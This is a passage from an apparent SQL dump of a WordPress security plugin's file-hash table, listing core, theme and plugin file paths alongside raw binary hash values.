�}�M.M��r','wp-content/themes/magazine-hoot/hybrid/inc/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5��\0@�9�','���\nG�	5�bRA�ٝ�D����~V��','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�߻V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('�UW�~/N��	�	�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nԤ���榡..�X	','���`5�ş�wo���(^�5��U_�gJ�','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��}�as�	����?�w','��K���yc��TsKfsb{���-	k�X��','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8�	��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'A��5;�\\\rCw���O]','A��5;�\\\rCw���O]','�\"�(sE�S\'�(ö�l�(X���!����O�','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 B��b4��8�Tb','g.	�YZ��:Y�(�m�<�bB6�<����hX\"�','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�[2� �[\r�','bK���76V��P9$GA;&e�k�����','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~ܯ4��v�\0','�W��؀Po�Ep�x�]�%i1~Y\'$��]��U','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�\"H�$V���j��','Ǝͱ�e\Z�����N�hԊ_���.����A','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<Ya��g�v��U�C','�K����d�����Sj`ݝ���G�`���#�','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	��P�{��','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('�?����t@���Ô','wp-content/themes/magazine-hoot/hybrid/extend/css/admin-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʼn�\"�\\�]Őz9��','ot���CK����Z�3�����0DhC���_\\�','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�O�I�����Iԥ{','9YZ��A}7�=��:�\'Fo�G�\'�R�ɹ�_-','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'y�[�F�y4؃r���\0','y�[�F�y4؃r���\0','�EW{yk��ƅ�In��2N��c,\nZZM�{ޒg','',0,'?'),('�[�:�S���h	˸�','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1����!\0�o��','#@^�=}l5�@���W���sa�	#a� ��V','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��A��a�<�ά','�9ti?L\r���E��-,�*���<�a\\=�i�a','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�~_کk_�l\n��','�vC.z-�N�Y���	�C�<����ccl','',0,'?'),('�s�G������S4�','wp-content/plugins/wp-cerber/assets/flags/ca.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�1���I��;pl�s�','��Bx���zU�O.�.t��XB�@ͤ��%��','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�܀	���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�l-��y4Ngp0','wp-content/themes/twentytwentyone/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F\ZLO�k:�','Z�8��!!�P���8~�\0����e��h','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�ϩx.�@���� ','�eU\"O�8�W���|����v�����\'����~)','',0,'?'),('Ӣ7�W�^�)��]','wp-content/themes/magazine-hoot/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�[�e^��b�0aZ��','�z�K&��]�l\r�Jh:�n�%�~[`�Z5��','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�D�P�y��n�\\B�','�AQY��tQ�aK	hˤ�+\r�+�x,`⵽�','',0,'?'),('Ӱ�@p���� 5x�P','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��;��MS�\nQd�ڇ','&жd�I�I��2�8!�.!�е�̼���u�','',0,'?'),('�Ҡ�5�������i*Ǡ','wp-content/plugins/wp-cerber/assets/flags/ms.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֠��G/�������Ҳ','�cZ��/�n�[�`��=\Z4�~��+�)%�k�','',0,'?'),('��>Zb�o&����','wp-content/plugins/akismet/views/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ܥ&F�e@`','ۑ�&\Z錷�ې7�~�����rb�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^g�v~�9Qu�i�\r�','+���ƱO�N6���,�F���]�ڷ�O��/','',0,'?'),('��5��	.#<h�\"U','wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y2ɩ�\n:O��8�?','G�Es�ҙ�]r�c�`ǣL�g����ʠ!�H`Z','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�?���K\n�\n��9�','wp-content/themes/magazine-hoot/js/jquery.parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}wR��*���','Y�@�珷��-�����{r�ʼ�c\"�:�\rA�=','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Tf������','��`�<���DadXjM� 	<��\r[j�ߕA�m','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0>>�~��u��WlY','�\n�:�n�ޒY�Z�[�I	���g\0�����a�B','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝ̢����VN3����','cm[Tl5����Qy;��w0��N!<��/躬�','',0,'?'),('�\Z3	b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�%f��G���Pѣ��','wp-content/themes/twentytwenty/singular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9�&)e�k�i','�^��~��1o�U���K�����?[�*����','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�G�h˲�;��\'ݷ�/','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j|�ZY����P','���:.P��BIP��i�l�� 9h��� �j�	','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8;����2��/���G','�e\\���%��`#J˘��\n��Ú�n��̭7�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţ%	\Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s	`�A���;�y_���<��X�\Z�%Y�','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-�	%�7��5[�1�+i�uG�','',0,'?'),('�#:��!�\n$�;[�cG�','wp-content/themes/magazine-hoot/hybrid/customize/setting-array-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r������a Q�bh','Q�ŷ���\r�*�5:!T����F�l���Q��u','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m	�(�J\Z+x��,�','8�t�Ä���W�#��ښ�̟�+_@C����','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W��	�)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���NX���\\m��','P��[H{lW�@\0!�!��s�_�/j�F�Č�','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('��`��͊�z��ï�','wp-content/themes/magazine-hoot/css/jetpack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���O�u�z0��B�G','�\"ae�1M�7�����/\ny24�T\n�3��R�','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{G��(�땤h��','z��Х��Y���\'R�H�y��Ri�V~��\nȿy�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�I�k���o���^?\n�','��\0.����ɕ�`�	�Ʃ��P���','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7H7��g��t~��Ǿ^','���^��Q��EQ�>���[�!��Be&z��','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_{�m��<R�zx��','�4R���]�,}�\0���m��E�:��!�','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�(	aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{J����3=�f�','w��ko����xv&Aޭ�� T�gޗ���','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٽH`�	�@�:OwTa','wp-content/themes/magazine-hoot/include/admin/images/premium-widgets.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','* �1�7��i�v��q','�����	+��~:#σ<I�]6��T`Ty!','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���|��e,��','#���&=!����ȝp�x�ǻ�\\7��2�y','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v׫\0���\r��΋��:c��GO���','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�